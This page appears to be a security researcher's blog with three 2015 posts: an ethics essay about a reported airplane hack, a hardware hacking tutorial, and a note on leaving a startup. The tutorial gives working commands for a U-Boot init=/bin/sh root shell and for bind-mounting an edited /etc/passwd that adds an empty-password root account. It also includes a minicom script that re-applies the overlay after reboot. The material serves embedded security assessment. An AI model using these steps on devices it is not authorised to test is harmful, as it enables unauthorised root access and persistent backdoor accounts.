Friday, May 15, 2015

No More Free Thoughts - The Cost of Professionalism

"I'm Flying High Over Tupelo, Mississippi With America's Hottest Hacker, and We're All About To Die"

There are a lot of things Denver is known for being high on, mostly altitude. But lately it isn’t just the sticky green political battle that has been gaining attention; it’s the high-altitude antics of our local information security enthusiast, Chris Roberts. Like most highs, and hacked aviation systems, this story is bound to plummet into the lifeless, high-desert plains. Why? News agencies are reporting that Chris Roberts, as a passenger, took control of an airplane mid-flight by hacking the plane’s entertainment system and was able to briefly redirect the flight’s course.

The fact is that the information security industry, the Department of Defense, the aviation industry, and other agencies have known that this is possible for years. The capability itself is not news, and even if information security analysts want to presume they are the first to uncover a hole like this, they aren’t. Embedded systems engineers, especially those managing and building critical systems, are aware of these risks and are continually working toward cost-effective measures to combat them. After researching Internet of Things technology and embedded systems for over a decade, I came to realize that most engineering teams do understand their risks, but they are limited by budgetary constraints, talent, corporate politics, and time.

So, if the people who can effect real change in a risky technology generally know about the risk models, who really benefits from a dramatic act such as redirecting the course of a plane? Taking control of a plane mid-flight, and potentially acting against the best judgment of the humans in the cockpit and against the flight management system that constantly evaluates sensors and statistical models far faster than a human can react, benefits no one. Dramatizing the potential for loss of human life benefits no one. No one wins by creating fear, uncertainty, and doubt. So why do it?

Halcyon Days

Over the past several years, the information security industry has exploded from a small group of loose-knit hackers who all knew each other into an industry of millions of wannabe professionals vying for a speaker slot at the world-renowned Black Hat Briefings, DEFCON, or Hack In The Box security conferences. Our little universe has suddenly become saturated with newcomers who want to make a name for themselves and stake a claim on the high salaries that come with notoriety. But we’re also at a critical juncture in the technological advancement of the Internet, embedded systems, and accessibility.

The Internet of Things movement eschews the common perception of the Internet as a hidden highway of bits and bytes flowing through ethereal tubes, somehow disparate from the physical reality in which we all live. Instead, the Internet of Things and modern embedded systems create a conglomeration of the human experience and the digital highway, fusing the somatic human experience with intangible algorithmic expressions. The binding of these two universes means that, for the first time in human history, actions in an abstract virtual environment have a perceivable, tangible effect on the physical world. In other words, our thoughts now have consequences. Real consequences. And because of this, there are No More Free Thoughts. There is, instead, a quantifiable cost to everything we do as information security professionals.

When I performed the first remote hack of a vehicle security system in 2011 at Black Hat Briefings Las Vegas, I wasn’t aware of the real significance of what I had accomplished. To me, it was as simple as taking a small piece of technology, understanding its risks, and abusing its weaknesses to achieve a goal the device was never meant to achieve. I knew that I had proven there was a new set of risks to users of IoT technology, but I wasn’t conscious of how entwined our lives would become in this next iteration of the Internet, nor did I realize how quickly IoT would explode into every aspect of our lives. It became obvious very quickly that we, as a society, were evolving far faster than we intended, as we turned the Internet into the Internet of Us: the human-digital existential experience. And, as we all know, innovation far outpaces sound security practices.

Another early researcher into IoT technology, Barnaby Jack, proved that there was a direct risk to humans with his research into pacemaker hacking, automated saline drip systems, and even Automated Teller Machine (ATM) attacks. For about a year we happened to live in the same apartment building in San Francisco. One afternoon, months before he was scheduled to give a speech on pacemaker hacking at Black Hat, I ran into him in the elevator.

“What do you think is going to happen with this new era of embedded risks? Any predictions?” I asked.

“I don’t know, but it’s not going to be pretty.”

Industry of Cool

I’ll never forget how forlorn Barnes looked, realizing that our actions now meant human lives were hanging in the balance of information security work. It’s a scary thought that the right hacker could save hundreds of thousands of lives, or harm them. It’s a scary thought that Andrew Auernheimer was sent to prison for far less than probing critical medical systems. It’s a scary thought that Aaron Swartz was persecuted, and subsequently committed suicide, for simply downloading documents. It’s a scary thought that Stephen Watt was imprisoned for years for writing a computer program. It’s a scary thought that engineers are developing the next iteration of the Internet with no requirements from the government, or engineering organizations, to adhere to safety and security standards. It’s a scary thought that some of our own information security scene members would risk the lives of people on their own plane just to prove a point, far exceeding the legal sins of Andrew, Aaron, and Stephen.

As we traverse this brave new world of technology and an industry saturated with newcomers throwing `bows for attention and viability, we can’t allow our ranks to disintegrate into some Industry of Cool, where we only care about what will grab people’s attention. We now have to consider the end user’s physical safety, and adhere to ethics that put the consumer far ahead of any headline-grabbing desires. Risking the lives of the people we are supposedly trying to save is not just unethical, it’s abhorrent. We need to mature our industry beyond its infantile rock star thought models, and build a foundation of trust between our ranks, systems engineers, business owners, and especially consumers. Now, more than ever, consumers need us to speak on their behalf, not put them at risk.

Every topic we research, everything we hack, every joke we make on Twitter, now, more than ever, has a quantifiable cost. Think twice the next time you make a statement that could put those around you at tangible risk. Because now, in this brave new world of self-driving cars, WiFi-enabled pacemakers, and bionic limbs, there absolutely are No More Free Thoughts.

Don A. Bailey
Founder
Lab Mouse Security
https://www.securitymouse.com/

Friday, May 8, 2015

Mickey Mouse Hacks: Password Cracking Is a Waste of Energy

Get Disney On `Em

In the past year or so I've noticed a growing number of people stumbling on the same issues when getting into embedded systems design and hacking. It's odd how very few blogs are focusing on solutions to these very common problems. So, when I have a chance, I'm going to drop some tips and tricks here and there to help people out. 

I'd like to pretend that these are difficult tricks, and my ego is my cross to bear ;-), but the reality is these are simple ways of dealing with annoying hindrances in performing viable engagements with clients. There is no reason for someone to spend money paying for an engineer or auditor to perform work that can be sidestepped in less than a minute. So, the solutions I'll present in the "Mickey Mouse Hacks" blogs will serve to illuminate quick-and-dirty ways to minimize the time it takes to get to real work. 

It's easy to get distracted by shiny things. Don't. 

But, like I said, these solutions are largely easy breezy, and for anyone who spends more time engineering than hacking, they should already be in your general tool belt. Judging from the forum posts and blog posts I keep seeing that ask the same questions over and over, people do indeed have these tools; they just forget about them because they aren't often used by adversarial researchers.

Consoles, TTYs, and JTAG, Oh my!

Just like the cheesy Disney songs we hear people relentlessly singing in public (yes, Dads, I can tell that's a Frozen tune you're trying not to hum), embedded systems are pretty consistent. In other words, whether engineers intend it or not, they all pretty much sound the same. I know that's hard for some of us to admit, but when boxes are developed with almost exactly the same components, competing for exactly the same market, at very similar price points, of course the end products look bizarrely similar!

"But, Don! What about intellectual property!?" 

You're hilarious!
This is purely a matter of Darwinism. Systems designed for the same environment eventually collapse into the same model. Period. As a result, they usually have the same technologies: BusyBox, ARM, Ethernet, bla bla bla. And what's the number one way to visually assess what is going on within an embedded system? A serial console!

Generally, there are three primary goals for a reverse engineer: serial consoles, remote TTY sessions (telnet, SSH, etc.), and JTAG; not necessarily in that order.

The easiest target is always the serial console, followed by JTAG. Serial console ports are often exposed as TTL-level UART pins, and in most modern systems you can at least find a header already attached to the Printed Circuit Board (PCB) you're evaluating. Even if you can't find one, chances are you can discover one quickly by looking for four pins and evaluating those pins with a multimeter. The voltage levels will dictate whether it is likely to be a standard console.

Alternatively, one can simply obtain the datasheet for the chip being used, and identify which pins are likely to be the UART, then use a multimeter, and maybe some hypodermic needles to tap vias, to identify whether a port has been found. 

Regardless of the method, this is usually a small amount of effort at the beginning of any embedded engagement. 

However, there is one big restriction: serial consoles aren't great for long-term work. Typically, when assessing an embedded system, the work will primarily be done on a separate box. For most engineers, this means that remotely accessing the target box is highly desirable. But it isn't enough to simply set up an instance of netcat, or another tool, because engineers typically want the console characteristics that come with Telnet, SSH, and similar protocols. Terminal capabilities were designed for a reason.

As a result, people as of late love to pull out Ye Olde John the Ripper and crack that read-only password file. Boring!

JTR In Modern Embedded Systems is This Useful

Use the Serial Console Efficiently 

Since we know a serial console is almost always accessible, and we can almost always get shell access with it, we don't need to crack any passwords. Why? Two reasons. 

First, if you have console access and JTAG ability, you should never need console login credentials in the first place. You should always be able to interrupt a booting kernel and change RAM contents to ensure that the kernel boots into a mode (such as single-user mode) that allows you to manipulate credentials, or boots into a mode where a console is enabled.
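As a quick sketch of what that can look like in practice, assume the target happens to use the common U-Boot bootloader (plenty of boards don't, so treat the prompt and the argument values below as placeholders): break into the boot prompt over serial and point init at a shell before the kernel ever asks for a login.

```
# Hypothetical U-Boot session on the serial console; interrupt autoboot by
# pressing a key during the countdown to reach the "=>" prompt.

=> printenv bootargs
# Note the existing arguments, then re-set them with init=/bin/sh appended.
# The values below are placeholders for whatever printenv actually showed:
=> setenv bootargs console=ttyS0,115200 root=/dev/mtdblock2 rw init=/bin/sh
=> boot
# The kernel now drops straight into a root shell, no login required.
```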

This means that we should always, at the very least, be able to get root access on the serial console, which brings us to point number two: you should never need to crack a password to log in remotely if you have a local shell.

Bro, I'm seriously. 
There is an easy reason for this, and it's called the modern Linux kernel. Modern kernels are capable of union (or bind) mounts. This namespace capability allows the kernel to mount files and directories on top of other files and directories. Not familiar with namespaces, unions, or bind mounts? They're actually a feature of the Plan 9 Operating System that was integrated into Linux, along with procfs, and some other excellent Plan 9 concepts. 

Point being, applications running on the Linux system will use whatever file is at the name /etc/passwd. Remember, in namespace environments, this file system path is only a token. It doesn't necessarily reference an exact file, only the concept of a file. Because of this, you can abuse the namespace capabilities of the Linux kernel to place whatever file you want on top of this name, even in a read-only environment.

Read-Only Is For Suckers

This means that if your system performs a cryptographic check on the contents of root '/' or '/etc', and mounts the NVRAM partition read-only, you still win easily with one command:

`mount -o bind` wins every time!
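Concretely, from a root shell on the serial console, the whole trick might look like the following. The paths and the injected account name are just placeholders; the only real requirement is some writable location (a tmpfs like /tmp is almost always there) to hold your modified copy.

```
# Copy the read-only passwd file somewhere writable.
cp /etc/passwd /tmp/passwd

# Append a root-equivalent account of your own (placeholder name, empty password).
echo 'labmouse::0:0:labmouse:/:/bin/sh' >> /tmp/passwd

# Overlay the writable copy on top of the read-only name. Every subsequent
# open() of /etc/passwd now sees your file instead of the original.
mount -o bind /tmp/passwd /etc/passwd
```

If the target also keeps its hashes in a shadow file, the same bind trick applies to '/etc/shadow'.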
Guess what? You just saved yourself the ton of time and energy it would have taken to crack a password that doesn't matter anyway. The other benefit? You can now add and remove users at will, and re-add that state to the system on the next boot with a single command.

Now, you can log in remotely with no effort at all, because the telnetd application doesn't maintain a persistent file descriptor on the original '/etc/passwd' file. Instead, it only opens the file when it needs it, after you have applied the namespace adjustment. This means that telnetd, sshd, or any other system that deals with user credentials will interpret the data you want it to see instead of the data the system engineer intended.
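As a quick usage sketch (the IP address and account are the placeholders from the example above), the remote login now just works; and if nothing is listening yet, most BusyBox builds can spawn a daemon straight from the serial console:

```
# From the analysis box: log in over telnet with the injected account.
telnet 192.168.1.1

# If no telnet daemon is running on the target, start one from the serial
# console (BusyBox's telnetd applet, where available):
telnetd -l /bin/login
```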

Aaaand, we're done. 
Some people might complain at this point that this trick must be applied at every reboot, and that because of this it is "easier" to simply crack the password.

Yes and no. Yes, it would be nice to have the password. But the amount of electricity required to crack, in a reasonable amount of time, any password that isn't just "root", "12345", or something else guessable is not worth it. Since any decent engineer will always have at least minicom hooked up to a serial console, you can simply develop a minicom script that automates the injection of commands when certain "phrases" are seen. This lets minicom detect a reboot and wait for the appropriate time to send the given commands.
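For illustration, here's a rough sketch of such a script using minicom's runscript facility (typically kicked off with Ctrl-A G from inside minicom). The prompt string and file paths are assumptions about the target, and the exact syntax your build supports is documented in the runscript man page, so treat this as a starting point rather than a drop-in.

```
# Re-apply the passwd overlay after every reboot.
# Wait for the console to come back up with a root shell. Many embedded
# boxes expose one on serial without a login; otherwise, script the
# boot-interruption step from point one first.
expect {
    "# "
}
# Re-apply the overlay. If the writable copy lives on a tmpfs that is wiped
# at reboot, add send lines to recreate /tmp/passwd before this one.
send "mount -o bind /tmp/passwd /etc/passwd"
```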

Since the trick here is one single command that needs repeating, the mount command, there really isn't a lot of overhead. I'd much rather do this than bother with the energy costs of using a GPU cluster, a fast server, or - God forbid - a cloud-based password cracking utility.

Your data lives here.
As always, keep on hackin'! 

Don A. Bailey
Founder
Lab Mouse Security


Monday, April 20, 2015

Cloudless Skies: On Leaving Team Revolar

On Wednesday, April 15th, I officially left the Revolar team. Though the execution of my decision was swift, I had been contemplating it for several weeks, but not for the usual reasons you might find on an "I was part of a start-up" blog. There was no animosity, or even frustration, involved in the decision. Rather, it was a growing realization that the paths Jacqueline and I had envisioned for the company were growing more and more disparate. In this case, however, that is not a bad thing. In fact, I think it will benefit both of us substantially.

As most of my friends and peers know, I was one of the first information security researchers to dive into the Internet of Things (IoT) space seven years ago. I've been blessed to be a part of groundbreaking research focused on both attacking and defending IoT for that period of time. My experience in the embedded systems engineering space extends even further back, to the early 2000s, when, for a brief period, I focused on firmware reverse engineering and attacking IEEE 1275 systems on SPARC and Mac platforms.

As a result of these experiences, I wanted to build technology that could solve the issues I kept seeing over and over in consumer technology. While industrial environments are equally plagued by security risks, it is the consumer space where we are going to see risks grow from "Ack, someone stole my credit card number" to "Can we trust our car not to veer off a cliff?" (Hi Charlie and Chris). This dramatic shift in the capability of digital systems has yet to be addressed in any viable shape or form. While we are seeing standards initiatives being launched in the IoT and Machine to Machine (M2M) spaces, it will take a significant amount of time for new (and existing) companies to adopt or adhere to these standards.

That, for me, is where Revolar came into play. I saw the Revolar personal safety device as an exceptional example of a device that required a whole new level of information security integration. Jacqueline, being an intelligent and adaptable entrepreneur, immediately saw the viability of a partnership between us. Jackie and her team would define the business practice for the Minimum Viable Product (MVP), the personal safety device, and I would redesign the technology on which it should be built, integrating my existing Internet of Things security platform as a way of addressing potential security risks while creating viable licensing opportunities. It seemed like a perfect fit.

Over time, however, we found that our visions for the organization evolved in different directions. While I was more interested in creating a research and development product team, Jackie became more interested in developing within the personal safety space. While these things are not entirely separate from each other, the underlying logistics and strategies for the business models deviate substantially. I started to realize I was pulling her in a direction that was distracting her from her original goal: simply helping people with straightforward technology.

Thus, after a few discussions with my legal team, and a few more calls with the exceptional members of the Lab Mouse Security board of advisers, it made sense that if we were growing two separate trees in one ceramic pot, either the pot would shatter or one tree would have to be replanted. I chose to preemptively replant myself in the Lab Mouse pot.

For transparency, however, I will openly admit that I left the organization without asking for equity or a return on my time. There are several very important reasons for this. First and foremost, I did not want to take capital away from the team when they are at a critical juncture financially. As most of my peers know, my hourly consulting rate is a fair one, but our industry as a whole is expensive. If I were to forgo equity and ask for a return on my time as a consultant, it would take a significant toll on the Revolar team in the middle of a critical round of funding.

Secondly, I refused to push for equity as a return on my time because of the implication of holding stock in an organization in which I have no influence. Since I will not be developing the Revolar technology, cloud infrastructure, or communications protocol, I cannot in good conscience profit from a consumer offering whose security model I have not been able to audit or design. That said, I know the Revolar team is exceptionally talented, intelligent, and resourceful, and will do everything in their power to release a product that addresses consumer safety effectively.

Overall, I have to say that this was one of my favorite business experiences. I learned an exceptional amount from the Revolar team in these months, and I am proud to have been a part of their growth, even for a short period of time. I wish them nothing but the best, and hope to see them all succeed in their goal of bringing safety technology to the consumer market in the near future.

Best wishes for a brilliant flight,

Don A. Bailey
Founder
Lab Mouse Security
https://www.securitymouse.com/
@InfoSecMouse